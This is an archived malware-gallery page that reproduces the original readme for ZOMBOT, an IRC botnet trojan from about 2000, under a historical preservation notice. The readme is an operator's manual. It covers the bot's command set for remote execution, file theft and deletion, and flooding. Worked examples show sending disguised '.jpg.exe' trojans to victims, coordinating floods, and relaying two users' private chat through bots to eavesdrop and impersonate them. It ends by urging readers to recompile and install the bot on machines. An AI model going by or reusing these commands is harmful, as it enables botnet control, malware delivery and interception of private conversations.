Archive A Reconstructed © MegaSecurity Database
ZOMBOT
Copyright © MegaSecurity
By Zombie
Informations
| Author | Zombie |
| Family | ZOMBOT |
| Category | Remote Access |
| Version | ZOMBOT |
Author Information / Description
Z-O-M-B-O-T version 1.xx (x) 2000
~~~~~~~~~~~
play with your own IRC army
Main idea is that ZOMBOT.EXE will be installed on hundreds machines,
and each zombot will connect to IRC, increasing your power.
- join IRC
- receive commands from you; forward 'em to IRC server
[*] To force zombot do single action N times (i.e. send it back to IRC):
/PRIVMSG abc :<psw1> <[xN] action>
[*] Also, single action may be sent to a channel with some zombots:
/PRIVMSG #ch :<psw1> <[xN] action>
[*] To force broadcast action, i.e. to distribute single action between
all zombots on the IRC: (N=probability of each single action, if defined)
/PRIVMSG abc :<psw1> $bcast <[pN] [xN] action>
broadcast action should not be sent to a chan;
it also may not contain psw1 substring.
[*] <action> can be any IRC command, or one of the following commands:
$bcast <action> -- do broadcast action
$quit -- quit IRC, quit zombot.exe (until reboot)
$sleep <N> -- quit IRC, sleep N seconds, then return.
reboot-independent
$rename [nick1 [nick2...]] -- change nickname. (no nick == random)
try all given nicknames, then set random
$forward [nick|<#chan|*] -- forward IRC output to nick/chan, *=clear
$flood <nick> -- do flood (from current bot)
$info [nick|#chan] -- return zombot/machine info
$exec <cmdline> -- execute cmdline; %windir% & etc. allowed
$dump [[fname] nick|#chan] -- dump file. no fname == $exec's result
$cd [path] -- get/set current directory
$dir [path: [/s]] -- dir, /s=recursive
$delete <filename> -- delete file
$stop -- use it to break $dump/$dir [NO PSW]
$kix0r <#chan> <nick> -- same as if <nick> kicked/deopped brother
$brolist -- dump current brother list
$ini list -- view IRC_commands_to_exec_at_startup
$ini del -- delete ini file
$ini add <text> -- append one line to ini file
$dcc send <nick> <fname> -- dcc send file to nick
$dcc recv -- accept dcc send, i.e. receive file
$redir list -- list redirect info
$redir del -- del all redirect info
$redir del <n> -- del redirect entry #n
$redir add <src> <dst> [hide] --redirect src nick/chan to dst nick/chan
'hide' means to disable source info
$servlist list -- list IRC server list
$servlist del -- delete IRC server list
$servlist del <n> -- delete IRC server list #n
$servlist add hostname minport maxport -- add IRC server
...
Any $-prefixed commands added into .INI file will be executed at
startup. Thus, adding static IRC server into list looks as following:
PRIVMSG abc :<psw1> $ini add $servlist add us.undernet.org 6665 6668
[*] Examples
#virus -- target channel
abc, cde -- zombots on #virus
xyz, qqq, ... -- other zombots (not on chan)
retch -- motherfucker
fux0r1 -- default psw1
PRIVMSG abc :fux0r1 JOIN #virus -- abc has joined #virus
PRIVMSG cde :fux0r1 $bcast JOIN #virus -- abc,xyz,qqq,... has joined #virus
PRIVMSG cde :fux0r1 $ini del -- make this bot joining only #virus
PRIVMSG cde :fux0r1 $ini add JOIN #virus each time its started
PRIVMSG xyz :fux0r1 $flood retch -- flood with finger/etc. requests
PRIVMSG xyz :fux0r1 x100 PRIVMSG retch :are you alive? -- kind of flood
PRIVMSG abc :fux0r1 $bcast $flood retch -- force abc,cde,xyz,... to flood
dcc send qqq pussy.jpg.exe -- send virus to qqq, qqq is my bot
PRIVMSG qqq :fux0r1 $dcc recv -- force qqq to receive file
PRIVMSG qqq :fux0r1 $rename pussy
PRIVMSG pussy :fux0r1 JOIN #virus
PRIVMSG pussy :fux0r1 $redir mynick lamer hide -- redirect my msgs to lamer
PRIVMSG pussy :fux0r1 $redir lamer mynick -- and vise versa
PRIVMSG pussy :hava new kewl pic for u!
PRIVMSG pussy :$dcc send lamer pussy.jpg.exe
[*] SUPER-JOKE
let we know that there're nick names jack and john.
let we have two zombots on IRC, bot1 and bot2.
now, see what i'm doing:
normal chat: jack <--irc--> john
now becomes: jack <--irc--> _john <--irc--> _jack <--irc--> john
==bot1 ==bot2
[1] install bot1 (_john) between jack and _jack
PRIVMSG bot1 :fux0r1 $redir add jack _jack hide
PRIVMSG bot1 :fux0r1 $redir add _jack jack hide
PRIVMSG bot1 :fux0r1 $rename _john
[2] install bot2 (_jack) between john and _john
PRIVMSG bot2 :fux0r1 $redir add john _john hide
PRIVMSG bot2 :fux0r1 $redir add _john john hide
PRIVMSG bot2 :fux0r1 $rename _jack
[3] and now, install hukker (let it be your nick)
as a mathafukka watching private chat between _jack and _john,
i.e. between real jack and john
PRIVMSG _john :fux0r1 $redir add jack hukker
PRIVMSG _john :fux0r1 $redir add _jack hukker
PRIVMSG _jack :fux0r1 $redir add john hukker
PRIVMSG _jack :fux0r1 $redir add _john hukker
[4] well, private chat may be started right now ;-)
PRIVMSG _jack :fux0r1 PRIVMSG john :hi, john!
[5] lets see, what happened as a result of our manipulations:
_jack --> john : hi, john!
john --> _jack : hi, how's life?
_jack --> _john : hi, how's life? _jack --> hukker : john>> hi, how's life?
_john --> jack : hi, how's life?
jack --> _john : good, and yours?
_john --> _jack : good, and yours? _john --> hukker : jack>> good, and yours?
_jack --> john : good, and yours?
...
[6] Well, now hukker is tired of watching private chat.
So, he breaks their happy connection, inserting himself between
_jack(jack) and _john(john).
PRIVMSG _jack :fux0r1 $redir del
PRIVMSG _jack :fux0r1 $redir add john hukker
PRIVMSG _jack :fux0r1 $redir add hukker john hide
PRIVMSG _john :fux0r1 $redir del
PRIVMSG _john :fux0r1 $redir add jack hukker
PRIVMSG _john :fux0r1 $redir add hukker jack hide
hukker --> _jack : have to go. btw, this is my foto
_jack --> john : have to go. btw, this is my foto
PRIVMSG _jack :fux0r1 $dcc send john photo.jpg.exe
hukker --> _john : time to go, jacky... i'll email you my foto. bye
_john --> jack : time to go, jacky... i'll email you my foto. bye
turn _jack/_john out from IRC for 10 mins:
PRIVMSG _jack :fux0r1 $sleep 600
PRIVMSG _john :fux0r1 $sleep 600
By the way, the same thing may be performed using two emails.
Just find two serious guys, and install email connection between'em. ;-)
[*] Authentication
Use HOST2REAL.EXE <yourhostname> to get your IRC realname.
Such realname will be accepted by all zombots as "one of us",
and you will be "protected" person on channel with zombots.
[*] other features
All zombots will protect each other.
This means, that when somebody kicks/bans/deops some zombot on a chan,
all other zombots will kick/ban sucker, and, moreover, kicked bot
will rejoin and send broadcasting message to all others to flood badguy.
[*] Using ZOMBOTs
If you're reading this text, then i've played with bots enough. ;-)
So, change irc_psw, recompile bot and install/run it on some machines.
As you can see, zombots was initially designed as a distributed
flooding mechanism, to be used in the channel takeover actions. So,
Seek & Enjoy! X-)
ZombieThis archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.